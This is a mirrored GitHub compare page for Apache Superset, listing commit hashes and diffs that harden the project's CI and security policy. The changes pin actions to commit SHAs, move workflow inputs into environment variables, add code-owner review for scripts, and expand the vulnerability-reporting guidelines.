mirror of
https://github.com/apache/superset.git
synced 2026-05-03 06:54:19 +00:00
Compare commits
539 Commits
backup/sem
...
fix/postgr
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ac864cc94b | ||
|
|
f255f63953 | ||
|
|
2c7d25f829 | ||
|
|
96595965b8 | ||
|
|
3da51ac3eb | ||
|
|
9d480bc79d | ||
|
|
e709c191db | ||
|
|
2026a1de6a | ||
|
|
abd93444d0 | ||
|
|
eb2645affe | ||
|
|
ad20285dd6 | ||
|
|
6a89955217 | ||
|
|
579fe23a5e | ||
|
|
66fce58697 | ||
|
|
ac44902145 | ||
|
|
1b3d070997 | ||
|
|
57e563b177 | ||
|
|
edf4d03218 | ||
|
|
78950fc18e | ||
|
|
d6bbe6da9b | ||
|
|
d7941ccfec | ||
|
|
d79eb5842a | ||
|
|
970b5bcf75 | ||
|
|
7c4f87615b | ||
|
|
f0d521dfc2 | ||
|
|
39f12786a2 | ||
|
|
012bf52c8c | ||
|
|
0d50fd676b | ||
|
|
acdf70176a | ||
|
|
dae79a6cba | ||
|
|
362e5bf45e | ||
|
|
b1b6a057d8 | ||
|
|
9b52110ab1 | ||
|
|
fc84d5d959 | ||
|
|
d62f1546aa | ||
|
|
b6ac1ef63c | ||
|
|
59bc895f3f | ||
|
|
bc2ffc66e5 | ||
|
|
e10918307c | ||
|
|
68ee776ad6 | ||
|
|
0d681338aa | ||
|
|
6c88fcacfa | ||
|
|
e16656c6cf | ||
|
|
07c8e7f303 | ||
|
|
b2468d3752 | ||
|
|
7934665ac1 | ||
|
|
9366868f8f | ||
|
|
ae61000a12 | ||
|
|
7174695be7 | ||
|
|
4ee3a0fc07 | ||
|
|
f6c5219e89 | ||
|
|
0a2b837c89 | ||
|
|
d3c562657a | ||
|
|
be90e08f83 | ||
|
|
4e74dc0250 | ||
|
|
72d39bea85 | ||
|
|
e9030b7fac | ||
|
|
f672b143db | ||
|
|
9f42ccecec | ||
|
|
5af17c7976 | ||
|
|
18d89f25ce | ||
|
|
73c4240ba4 | ||
|
|
1903b919d6 | ||
|
|
44177b4e35 | ||
|
|
e1ed5003a8 | ||
|
|
e6853894ab | ||
|
|
05fc5bb424 | ||
|
|
c373498543 | ||
|
|
fb3e129d62 | ||
|
|
003c232192 | ||
|
|
a51bbd46dc | ||
|
|
e77cfc93ed | ||
|
|
ef290b28e2 | ||
|
|
dd18b2eb54 | ||
|
|
d7a8c1934a | ||
|
|
af7a62ab3f | ||
|
|
69d2da9c61 | ||
|
|
67bc910eb5 | ||
|
|
a89f9bcb98 | ||
|
|
b302071723 | ||
|
|
e45330c2fd | ||
|
|
bd8d3ffb2d | ||
|
|
5e3a7ba106 | ||
|
|
c1a3de719a | ||
|
|
33deb028a6 | ||
|
|
919daabe54 | ||
|
|
0f2769ca3e | ||
|
|
a4a67296af | ||
|
|
b4000a025d | ||
|
|
a9761932bc | ||
|
|
29806780dc | ||
|
|
191337e08d | ||
|
|
a222dab781 | ||
|
|
230b25dd72 | ||
|
|
151d7d76da | ||
|
|
4f19bc4c5f | ||
|
|
11607dde04 | ||
|
|
e1bdb94efc | ||
|
|
6535fdd556 | ||
|
|
5fb89b865d | ||
|
|
6948e73ec7 | ||
|
|
c4cf03f899 | ||
|
|
d3de16c5f5 | ||
|
|
78fb09695b | ||
|
|
06818008c2 | ||
|
|
52ba4fd0cb | ||
|
|
4f2fa41f4e | ||
|
|
bf7ec853fa | ||
|
|
9fe3f634ec | ||
|
|
899e9294b2 | ||
|
|
dc9b459b27 | ||
|
|
7d3881f1da | ||
|
|
e5f9a6bf4b | ||
|
|
5cff657812 | ||
|
|
16387b0815 | ||
|
|
0857611a4e | ||
|
|
51ea2c297d | ||
|
|
fbd062165e | ||
|
|
55625c911f | ||
|
|
fca64de8e9 | ||
|
|
03725d1aaa | ||
|
|
a9487cbc84 | ||
|
|
ce5b2aa424 | ||
|
|
e535dce030 | ||
|
|
a7310b1fce | ||
|
|
cd6ce881a5 | ||
|
|
f0ef9f5e9c | ||
|
|
4ae16cb140 | ||
|
|
3d85e8e23b | ||
|
|
690a411cf3 | ||
|
|
be680408c9 | ||
|
|
4bdc8d4c68 | ||
|
|
db7a2bd682 | ||
|
|
2e0d482ccf | ||
|
|
e5b3a9c25d | ||
|
|
c289731212 | ||
|
|
f850c6b1b1 | ||
|
|
8ce234371b | ||
|
|
e5820b6b2b | ||
|
|
69f062b804 | ||
|
|
735dd5dbae | ||
|
|
cd7dddb5a1 | ||
|
|
7c76fd3d81 | ||
|
|
0b419a07f5 | ||
|
|
0b51e9cd5e | ||
|
|
e7b9fb277e | ||
|
|
838ee870d0 | ||
|
|
84af6c9f29 | ||
|
|
05227e8a80 | ||
|
|
76a209663d | ||
|
|
61c45e3dd8 | ||
|
|
e11a50bedf | ||
|
|
f4a6ea0fde | ||
|
|
e542e9f840 | ||
|
|
e0dcb2908d | ||
|
|
eaccb2e471 | ||
|
|
c1a1f2e7e7 | ||
|
|
45d5501aa7 | ||
|
|
388596e4fe | ||
|
|
b11d4f3ef0 | ||
|
|
998b9e387b | ||
|
|
b3e88db87e | ||
|
|
8471e82342 | ||
|
|
c3a0f2749b | ||
|
|
c2d96e0dce | ||
|
|
44e77fdf2b | ||
|
|
18d6feb499 | ||
|
|
0d91f5e982 | ||
|
|
5661fc9128 | ||
|
|
a6156676c8 | ||
|
|
b2bd2329bc | ||
|
|
724f1484b9 | ||
|
|
84f7b4a973 | ||
|
|
ddcb9be9a7 | ||
|
|
8d9b5bd479 | ||
|
|
4b88fc57b4 | ||
|
|
b76080e291 | ||
|
|
411f769896 | ||
|
|
ffcc6e8b63 | ||
|
|
86575e129b | ||
|
|
3e25f02da9 | ||
|
|
002d8ad1e4 | ||
|
|
6287a07912 | ||
|
|
fa97d0357f | ||
|
|
f836c3eccd | ||
|
|
499e27ea54 | ||
|
|
c2a35e2eea | ||
|
|
5138aa2c11 | ||
|
|
66a9e2e16e | ||
|
|
0f417f0040 | ||
|
|
1462ac9282 | ||
|
|
da371217ef | ||
|
|
c971ea3ec6 | ||
|
|
de98fdc37b | ||
|
|
fa1f12a0b5 | ||
|
|
de40b58e10 | ||
|
|
eea3557f61 | ||
|
|
7a243d329e | ||
|
|
98146251c4 | ||
|
|
0aa8cace1b | ||
|
|
450701ecec | ||
|
|
e9911fbac4 | ||
|
|
69c8eef78e | ||
|
|
2ff50667e7 | ||
|
|
f1cf274751 | ||
|
|
b65396ccd4 | ||
|
|
1ad76e847e | ||
|
|
4583ef93a4 | ||
|
|
f632d2474b | ||
|
|
b1d69f5b39 | ||
|
|
aba7e6dae4 | ||
|
|
8bcc90c766 | ||
|
|
e39dd1afce | ||
|
|
680cef0ee0 | ||
|
|
e17cf3c808 | ||
|
|
f49310b8ff | ||
|
|
c7955a38ef | ||
|
|
68067d7f44 | ||
|
|
5815665cc6 | ||
|
|
6649f35a0d | ||
|
|
5263abdc60 | ||
|
|
c49641538d | ||
|
|
d915e4f3ff | ||
|
|
bad5a35fce | ||
|
|
1bde6f3bfd | ||
|
|
4e0890ee1f | ||
|
|
d63308ca37 | ||
|
|
63cceb6a79 | ||
|
|
b8b2bdedf9 | ||
|
|
d5017e60c3 | ||
|
|
2e80f2a473 | ||
|
|
4c2dd63464 | ||
|
|
62302ad8c3 | ||
|
|
ed659958f3 | ||
|
|
36de05fe36 | ||
|
|
a64609f4f3 | ||
|
|
140f0001f2 | ||
|
|
587fe4af63 | ||
|
|
3a3a6536b7 | ||
|
|
4f695e1b4d | ||
|
|
6ba9096870 | ||
|
|
5106afb07f | ||
|
|
2bd4131636 | ||
|
|
7e452df1cc | ||
|
|
a626d06415 | ||
|
|
d159edc9a6 | ||
|
|
96fa2cbd2b | ||
|
|
9750881193 | ||
|
|
3db92021c7 | ||
|
|
5ccfc530b2 | ||
|
|
5f9fc31ae2 | ||
|
|
8e811de564 | ||
|
|
027de6339b | ||
|
|
bf9aff19b5 | ||
|
|
b05764d070 | ||
|
|
7be2acb2f3 | ||
|
|
83ad1eca26 | ||
|
|
92747246fc | ||
|
|
7380a59ab8 | ||
|
|
e56f8cc4fb | ||
|
|
7c79b9ab61 | ||
|
|
a62be684a0 | ||
|
|
a3dfbd7bff | ||
|
|
12eb40db01 | ||
|
|
d796543f5a | ||
|
|
e5ae626433 | ||
|
|
8195574345 | ||
|
|
6b029997d9 | ||
|
|
7a64483e6b | ||
|
|
e424b55036 | ||
|
|
613e6d6cde | ||
|
|
b3a402d936 | ||
|
|
c7d175b842 | ||
|
|
851bbeea48 | ||
|
|
c5bce756f0 | ||
|
|
3239f058c8 | ||
|
|
7e0c634c3a | ||
|
|
a9ced5c881 | ||
|
|
ace5f9d8c2 | ||
|
|
0452d1515a | ||
|
|
0330fdeb00 | ||
|
|
f2ff24d811 | ||
|
|
c51132f824 | ||
|
|
b4cb815ebf | ||
|
|
08d1ddd9fb | ||
|
|
23ac4cb3a4 | ||
|
|
5662ecab15 | ||
|
|
9e27d682f6 | ||
|
|
f0fcdcc76a | ||
|
|
135e0f8099 | ||
|
|
25eea295f6 | ||
|
|
c372f5980c | ||
|
|
3802acb1e0 | ||
|
|
bdb0030cf8 | ||
|
|
87f0540acd | ||
|
|
985d7b6a79 | ||
|
|
59f92f979a | ||
|
|
5cc286e383 | ||
|
|
26f4a5acad | ||
|
|
fdd08d3b70 | ||
|
|
1aac6c9474 | ||
|
|
7acb0c6d05 | ||
|
|
00eb86d03f | ||
|
|
1d0e836a29 | ||
|
|
ec6640b188 | ||
|
|
ff3b8d8398 | ||
|
|
022342839a | ||
|
|
38f0dc74f7 | ||
|
|
0bae05d4a9 | ||
|
|
1bb41a6e60 | ||
|
|
4423134739 | ||
|
|
190f1a59c5 | ||
|
|
5f99d613a0 | ||
|
|
6adc816805 | ||
|
|
aa97679327 | ||
|
|
94d8735d4b | ||
|
|
64c8d652e1 | ||
|
|
d30c5b4eee | ||
|
|
8ed75787cb | ||
|
|
4ee391e0d7 | ||
|
|
a67ca052d6 | ||
|
|
6b6e3803d1 | ||
|
|
51ec61c675 | ||
|
|
424f99efdf | ||
|
|
070be3de8b | ||
|
|
bd98269628 | ||
|
|
7ce371080c | ||
|
|
872632aca0 | ||
|
|
64bd03bd70 | ||
|
|
1e2d0faa55 | ||
|
|
8559786cc2 | ||
|
|
d4d22909cb | ||
|
|
4fae5758d5 | ||
|
|
f85efe6139 | ||
|
|
6ea9f2ade9 | ||
|
|
4036b784ed | ||
|
|
08a4ad662a | ||
|
|
e4021fb6e7 | ||
|
|
53b1d1097c | ||
|
|
55aa36fef8 | ||
|
|
3abcfb797a | ||
|
|
a741ddc03c | ||
|
|
7d26e33346 | ||
|
|
f6cd8066ab | ||
|
|
daefedebcd | ||
|
|
c37a3ec292 | ||
|
|
4245720851 | ||
|
|
f0b20dc445 | ||
|
|
e6f1209318 | ||
|
|
944944c49e | ||
|
|
ecbf396d4a | ||
|
|
b1474aaa60 | ||
|
|
b49e899974 | ||
|
|
11f2140c37 | ||
|
|
f1cd1ae710 | ||
|
|
e0a0a22542 | ||
|
|
2c9cf0bd55 | ||
|
|
38fdfb4ca2 | ||
|
|
15bab227bb | ||
|
|
d331a043a3 | ||
|
|
41d401a879 | ||
|
|
89f7e5e7ba | ||
|
|
aa1a69555b | ||
|
|
d1903afc69 | ||
|
|
dbc25dc555 | ||
|
|
a5d2324e21 | ||
|
|
38e82e4084 | ||
|
|
6bcc8bf2b2 | ||
|
|
f832f9b0d5 | ||
|
|
fc705d94e3 | ||
|
|
65eae027fa | ||
|
|
ac96f46c76 | ||
|
|
5c782397bb | ||
|
|
40387d5daa | ||
|
|
7f3351011d | ||
|
|
d6a6b6db14 | ||
|
|
388a1fd0be | ||
|
|
c2c929bf94 | ||
|
|
41473a520e | ||
|
|
50a5bb0671 | ||
|
|
20d0cfd156 | ||
|
|
5ad91fbb09 | ||
|
|
6229c99050 | ||
|
|
7e69d5d839 | ||
|
|
8700ec4e6d | ||
|
|
8cbf5fb8df | ||
|
|
9c288d66b5 | ||
|
|
8983edea66 | ||
|
|
95820fb9e6 | ||
|
|
6dc3d7ad9f | ||
|
|
cfa1aba1e0 | ||
|
|
43816d7528 | ||
|
|
6dd82afb0b | ||
|
|
e045f49787 | ||
|
|
38d3a39c06 | ||
|
|
23a5e95884 | ||
|
|
16f5a2a41a | ||
|
|
04e07acf98 | ||
|
|
3506773f51 | ||
|
|
d32e975eb9 | ||
|
|
21fb5a27e9 | ||
|
|
403f4ad78c | ||
|
|
ba5820b088 | ||
|
|
a93e319716 | ||
|
|
12aca72074 | ||
|
|
3fb903fdc6 | ||
|
|
4b26f8c712 | ||
|
|
37c4a36fdb | ||
|
|
811dcb3715 | ||
|
|
ccaac306e5 | ||
|
|
c596df9294 | ||
|
|
6852349d24 | ||
|
|
7c9d75b69e | ||
|
|
42201a98a1 | ||
|
|
09594b32f9 | ||
|
|
e2bb20121e | ||
|
|
56ebfb7848 | ||
|
|
5d9f53ff0c | ||
|
|
89d1b80ce7 | ||
|
|
962abf6904 | ||
|
|
ed3c5280a9 | ||
|
|
7222327992 | ||
|
|
e0b524fff2 | ||
|
|
e67bc5bee5 | ||
|
|
86a260e39b | ||
|
|
fdcb942f3c | ||
|
|
7a5c07b99c | ||
|
|
6d93eeb533 | ||
|
|
44179199ba | ||
|
|
100ad7d9ee | ||
|
|
c96c817ef5 | ||
|
|
519a64da82 | ||
|
|
24be9cd515 | ||
|
|
1987e816a5 | ||
|
|
0f4aa1ceea | ||
|
|
601fb45142 | ||
|
|
c9ebb13fa1 | ||
|
|
618113079f | ||
|
|
cc34d19d24 | ||
|
|
02ffb52f4a | ||
|
|
361afff798 | ||
|
|
2a6b0215f0 | ||
|
|
c1c296233f | ||
|
|
e05fdd8acd | ||
|
|
83823911b5 | ||
|
|
7004369c68 | ||
|
|
f5d7ce0f86 | ||
|
|
32eb8c8263 | ||
|
|
44c2c765ae | ||
|
|
0d5721910e | ||
|
|
28d67d59cd | ||
|
|
1d72480c17 | ||
|
|
1af5da6aad | ||
|
|
ea1c6ee30f | ||
|
|
97ea479cdc | ||
|
|
e088979fbe | ||
|
|
5e5c05362c | ||
|
|
c2a21915ff | ||
|
|
cbb2b2f3c2 | ||
|
|
82a74c88aa | ||
|
|
6b9dd23e3a | ||
|
|
b754f2d173 | ||
|
|
ee233d16d6 | ||
|
|
65f13f773e | ||
|
|
d4646d43a7 | ||
|
|
6465450b64 | ||
|
|
01aa4d3281 | ||
|
|
211f29b723 | ||
|
|
d6bfc98a61 | ||
|
|
5457c2da67 | ||
|
|
14b1b456e1 | ||
|
|
972e15e601 | ||
|
|
03de7e1ec6 | ||
|
|
3edf75123a | ||
|
|
fd1c423826 | ||
|
|
a314e5b35e | ||
|
|
e02ca8871d | ||
|
|
834d2abe70 | ||
|
|
91986fff02 | ||
|
|
05b9970aa6 | ||
|
|
6f301707f9 | ||
|
|
5865176f36 | ||
|
|
461037f645 | ||
|
|
c980f39aab | ||
|
|
a854fa60a2 | ||
|
|
1c8224f4c6 | ||
|
|
ca403dc45d | ||
|
|
96705c156a | ||
|
|
7909095ff3 | ||
|
|
aa5adb0fce | ||
|
|
dcb414aa06 | ||
|
|
afe093f1ca | ||
|
|
cc066b3576 | ||
|
|
39cd1cdd43 | ||
|
|
176bf00c16 | ||
|
|
68e38c8893 | ||
|
|
48220fb33f | ||
|
|
ed622e254a | ||
|
|
6e7d6a85b4 | ||
|
|
e8061a9c2b | ||
|
|
97a66f7a64 | ||
|
|
b6c3b3ef46 | ||
|
|
f4a57a13bc | ||
|
|
242636b36b | ||
|
|
ba7d7dcec0 | ||
|
|
ba7271b4d8 | ||
|
|
ca2d26a1e2 | ||
|
|
f6106cd26f | ||
|
|
1867336907 | ||
|
|
f5383263bc | ||
|
|
d5cf77cd60 | ||
|
|
f458e2d484 | ||
|
|
af5e05db2e | ||
|
|
32a64d02c7 | ||
|
|
9516d1a306 | ||
|
|
d91b96814e | ||
|
|
56d6bb1913 | ||
|
|
fc156d0014 | ||
|
|
0b8df8d3f2 | ||
|
|
83955e87ac | ||
|
|
4a9db243a1 | ||
|
|
d4f1f8db00 | ||
|
|
95f61bd223 | ||
|
|
7f476a79b3 | ||
|
|
65e21cf13c | ||
|
|
7943af359c | ||
|
|
09e9c6a522 | ||
|
|
a9def2fc15 | ||
|
|
27197faba9 | ||
|
|
ffe60bd960 | ||
|
|
d752be5f74 | ||
|
|
3056c41507 | ||
|
|
d42e9c4d1b | ||
|
|
5912941942 | ||
|
|
9b8106b382 | ||
|
|
9215eb5e45 | ||
|
|
fe7f220c21 | ||
|
|
3bb9704cd5 | ||
|
|
eb77452857 |
5
.github/CODEOWNERS
vendored
5
.github/CODEOWNERS
vendored
@@ -22,6 +22,11 @@
|
||||
|
||||
/.github/ @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @sadpandajoe @hainenber
|
||||
|
||||
# Notify PMC members of changes to CI-executed scripts (supply-chain risk:
|
||||
# scripts/ files run directly in CI workflows and can execute arbitrary code)
|
||||
|
||||
/scripts/ @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @sadpandajoe @hainenber
|
||||
|
||||
# Notify PMC members of changes to required GitHub Actions
|
||||
|
||||
/.asf.yaml @villebro @geido @eschutho @rusackas @betodealmeida @nytai @mistercrunch @craig-rueda @kgabryje @dpgaspar @Antonio-RiveroMartnez
|
||||
|
||||
37
.github/SECURITY.md
vendored
37
.github/SECURITY.md
vendored
@@ -18,10 +18,32 @@ e-mail address [security@superset.apache.org](mailto:security@superset.apache.or
|
||||
More details can be found on the ASF website at
|
||||
[ASF vulnerability reporting process](https://apache.org/security/#reporting-a-vulnerability)
|
||||
|
||||
We kindly ask you to include the following information in your report:
|
||||
- Apache Superset version that you are using
|
||||
- A sanitized copy of your `superset_config.py` file or any config overrides
|
||||
- Detailed steps to reproduce the vulnerability
|
||||
**Submission Standards & AI Policy**
|
||||
|
||||
To ensure engineering focus remains on verified risks and to manage high reporting volumes, all reports must meet the following criteria:
|
||||
- Plain Text Format: In accordance with Apache guidelines, please provide all details in plain text within the email body. Avoid sending PDFs, Word documents, or password-protected archives.
|
||||
- Mandatory AI Disclosure: If you utilized Large Language Models (LLMs) or AI tools to identify a flaw or assist in writing a report, you must disclose this in your submission so our triage team can contextualize the findings.
|
||||
- Human-Verified PoC: All submissions must include a manual, step-by-step Proof of Concept (PoC) performed on a supported release. Raw AI outputs, hypothetical chat transcripts, or unverified scanner logs will be closed as Invalid.
|
||||
|
||||
We kindly ask you to include the following information in your report to assist our developers in triaging and remediating issues efficiently:
|
||||
- Version/Commit: The specific version of Apache Superset or the Git commit hash you are using.
|
||||
- Configuration: A sanitized copy of your `superset_config.py` file or any config overrides.
|
||||
- Environment: Your deployment method (e.g., Docker Compose, Helm, or source) and relevant OS/Browser details.
|
||||
- Impacted Component: Identification of the affected area (e.g., Python backend, React frontend, or a specific database connector).
|
||||
- Expected vs. Actual Behavior: A clear description of the intended system behavior versus the observed vulnerability.
|
||||
- Detailed Reproduction Steps: Clear, manual steps to reproduce the vulnerability.
|
||||
|
||||
**Out of Scope Vulnerabilities**
|
||||
|
||||
To prioritize engineering efforts on genuine architectural risks, the following scenarios are explicitly out of scope and will not be issued a CVE:
|
||||
- Attacks requiring Admin privileges: (e.g., CSS injection, template manipulation, dashboard ownership overrides, or modifying global system settings). Per the CVE vulnerability definition in CNA Operational Rules 4.1, a qualifying vulnerability must allow violation of a security policy. The Admin role is a fully trusted operational boundary defined by Apache Superset's security policy; actions within this boundary do not violate that policy and are therefore considered intended capabilities 'by design,' not vulnerabilities.
|
||||
- Brute Force and Rate Limiting: Reports targeting a lack of resource exhaustion protections, generic rate-limiting, or volumetric Denial of Service (DoS) attempts.
|
||||
- Theoretical attack vectors: Issues without a demonstrable, reproducible exploit path.
|
||||
- Non-Exploitable Findings: Missing security headers, generic banner disclosures, or descriptive error messages that do not lead to a direct, documented exploit.
|
||||
|
||||
**Outcome of Reports**
|
||||
|
||||
Reports that are deemed out-of-scope for a CVE but represent valid security best practices or hardening opportunities may be converted into public GitHub issues. This allows the community to contribute to the general hardening of the platform even when a specific vulnerability threshold is not met.
|
||||
|
||||
Note that Apache Superset is not responsible for any third-party dependencies that may
|
||||
have security issues. Any vulnerabilities found in third-party dependencies should be
|
||||
@@ -29,6 +51,13 @@ reported to the maintainers of those projects. Results from security scans of Ap
|
||||
Superset dependencies found on its official Docker image can be remediated at release time
|
||||
by extending the image itself.
|
||||
|
||||
**Vulnerability Aggregation & CVE Attribution**
|
||||
|
||||
In accordance with MITRE CNA Operational Rules (4.1.10, 4.1.11, and 4.2.13), Apache Superset issues CVEs based on the underlying architectural root cause rather than the number of affected endpoints or exploit payloads.
|
||||
- Aggregation: If multiple exploit vectors stem from the same programmatic failure or shared vulnerable code, they must be aggregated into a single, comprehensive report.
|
||||
- Independent Fixes: Separate CVEs will only be assigned if the vulnerabilities reside in decoupled architectural modules and can be fixed independently of one another.
|
||||
Reports that fail to aggregate related findings will be merged during triage to ensure an accurate and defensible CVE record.
|
||||
|
||||
**Your responsible disclosure and collaboration are invaluable.**
|
||||
|
||||
## Extra Information
|
||||
|
||||
6
.github/actions/setup-docker/action.yml
vendored
6
.github/actions/setup-docker/action.yml
vendored
@@ -26,16 +26,16 @@ runs:
|
||||
|
||||
- name: Set up QEMU
|
||||
if: ${{ inputs.build == 'true' }}
|
||||
uses: docker/setup-qemu-action@v3
|
||||
uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
|
||||
|
||||
- name: Set up Docker Buildx
|
||||
if: ${{ inputs.build == 'true' }}
|
||||
uses: docker/setup-buildx-action@v3
|
||||
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3.12.0
|
||||
|
||||
- name: Try to login to DockerHub
|
||||
if: ${{ inputs.login-to-dockerhub == 'true' }}
|
||||
continue-on-error: true
|
||||
uses: docker/login-action@v3
|
||||
uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
|
||||
with:
|
||||
username: ${{ inputs.dockerhub-user }}
|
||||
password: ${{ inputs.dockerhub-token }}
|
||||
|
||||
4
.github/dependabot.yml
vendored
4
.github/dependabot.yml
vendored
@@ -4,6 +4,10 @@ updates:
|
||||
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
ignore:
|
||||
# Ignore temporarily as release schedule is too mentally taxing for dep-handling maintainers
|
||||
# Additionally, very few PRs are reviewed by this action.
|
||||
- dependency-name: anthropics/claude-code-action
|
||||
schedule:
|
||||
interval: "daily"
|
||||
|
||||
|
||||
5
.github/labeler.yml
vendored
5
.github/labeler.yml
vendored
@@ -17,6 +17,11 @@
|
||||
- any-glob-to-any-file:
|
||||
- 'superset/migrations/**'
|
||||
|
||||
"risk:ci-script":
|
||||
- changed-files:
|
||||
- any-glob-to-any-file:
|
||||
- 'scripts/**'
|
||||
|
||||
############################################
|
||||
# Dependencies
|
||||
############################################
|
||||
|
||||
20
.github/workflows/bump-python-package.yml
vendored
20
.github/workflows/bump-python-package.yml
vendored
@@ -32,7 +32,7 @@ jobs:
|
||||
steps:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: true
|
||||
ref: master
|
||||
@@ -41,7 +41,7 @@ jobs:
|
||||
uses: ./.github/actions/setup-supersetbot/
|
||||
|
||||
- name: Set up Python ${{ inputs.python-version }}
|
||||
uses: actions/setup-python@v6
|
||||
uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6
|
||||
with:
|
||||
python-version: "3.10"
|
||||
|
||||
@@ -51,27 +51,31 @@ jobs:
|
||||
- name: supersetbot bump-python -p "${{ github.event.inputs.package }}"
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
INPUT_PACKAGE: ${{ github.event.inputs.package }}
|
||||
INPUT_GROUP: ${{ github.event.inputs.group }}
|
||||
INPUT_EXTRA_FLAGS: ${{ github.event.inputs.extra-flags }}
|
||||
INPUT_LIMIT: ${{ github.event.inputs.limit }}
|
||||
run: |
|
||||
git config --global user.email "action@github.com"
|
||||
git config --global user.name "GitHub Action"
|
||||
|
||||
PACKAGE_OPT=""
|
||||
if [ -n "${{ github.event.inputs.package }}" ]; then
|
||||
PACKAGE_OPT="-p ${{ github.event.inputs.package }}"
|
||||
if [ -n "${INPUT_PACKAGE}" ]; then
|
||||
PACKAGE_OPT="-p ${INPUT_PACKAGE}"
|
||||
fi
|
||||
|
||||
GROUP_OPT=""
|
||||
if [ -n "${{ github.event.inputs.group }}" ]; then
|
||||
GROUP_OPT="-g ${{ github.event.inputs.group }}"
|
||||
if [ -n "${INPUT_GROUP}" ]; then
|
||||
GROUP_OPT="-g ${INPUT_GROUP}"
|
||||
fi
|
||||
|
||||
EXTRA_FLAGS="${{ github.event.inputs.extra-flags }}"
|
||||
EXTRA_FLAGS="${INPUT_EXTRA_FLAGS}"
|
||||
|
||||
supersetbot bump-python \
|
||||
--verbose \
|
||||
--use-current-repo \
|
||||
--include-subpackages \
|
||||
--limit ${{ github.event.inputs.limit }} \
|
||||
--limit ${INPUT_LIMIT} \
|
||||
$PACKAGE_OPT \
|
||||
$GROUP_OPT \
|
||||
$EXTRA_FLAGS
|
||||
|
||||
2
.github/workflows/cancel_duplicates.yml
vendored
2
.github/workflows/cancel_duplicates.yml
vendored
@@ -31,7 +31,7 @@ jobs:
|
||||
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
if: steps.check_queued.outputs.count >= 20
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
|
||||
- name: Cancel duplicate workflow runs
|
||||
if: steps.check_queued.outputs.count >= 20
|
||||
|
||||
2
.github/workflows/check-python-deps.yml
vendored
2
.github/workflows/check-python-deps.yml
vendored
@@ -18,7 +18,7 @@ jobs:
|
||||
runs-on: ubuntu-22.04
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
persist-credentials: false
|
||||
submodules: recursive
|
||||
|
||||
@@ -25,9 +25,9 @@ jobs:
|
||||
pull-requests: write
|
||||
steps:
|
||||
- name: "Checkout ${{ github.ref }} ( ${{ github.sha }} )"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
- name: Check and notify
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
github-token: ${{ github.token }}
|
||||
script: |
|
||||
|
||||
6
.github/workflows/claude.yml
vendored
6
.github/workflows/claude.yml
vendored
@@ -44,7 +44,7 @@ jobs:
|
||||
pull-requests: write
|
||||
steps:
|
||||
- name: Comment access denied
|
||||
uses: actions/github-script@v8
|
||||
uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 # v9.0.0
|
||||
with:
|
||||
script: |
|
||||
const message = `👋 Hi @${{ github.event.comment.user.login || github.event.review.user.login || github.event.issue.user.login }}!
|
||||
@@ -71,12 +71,12 @@ jobs:
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
with:
|
||||
fetch-depth: 1
|
||||
|
||||
- name: Run Claude PR Action
|
||||
uses: anthropics/claude-code-action@beta
|
||||
uses: anthropics/claude-code-action@5fb899572b81d2bb648d4d187173a2f423a9677c # beta
|
||||
with:
|
||||
anthropic_api_key: ${{ secrets.ANTHROPIC_API_KEY }}
|
||||
timeout_minutes: "60"
|
||||
|
||||
2
.github/workflows/codeql-analysis.yml
vendored
2
.github/workflows/codeql-analysis.yml
vendored
@@ -31,7 +31,7 @@ jobs:
|
||||
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
|
||||
- name: Check for file changes
|
||||
id: check
|
||||
|
||||
6
.github/workflows/dependency-review.yml
vendored
6
.github/workflows/dependency-review.yml
vendored
@@ -27,9 +27,9 @@ jobs:
|
||||
runs-on: ubuntu-24.04
|
||||
steps:
|
||||
- name: "Checkout Repository"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
- name: "Dependency Review"
|
||||
uses: actions/dependency-review-action@v4
|
||||
uses: actions/dependency-review-action@2031cfc080254a8a887f58cffee85186f0e49e48 # v4.9.0
|
||||
continue-on-error: true
|
||||
with:
|
||||
fail-on-severity: critical
|
||||
@@ -49,7 +49,7 @@ jobs:
|
||||
runs-on: ubuntu-22.04
|
||||
steps:
|
||||
- name: "Checkout Repository"
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
|
||||
- name: Setup Python
|
||||
uses: ./.github/actions/setup-backend/
|
||||
|
||||
21
.github/workflows/docker.yml
vendored
21
.github/workflows/docker.yml
vendored
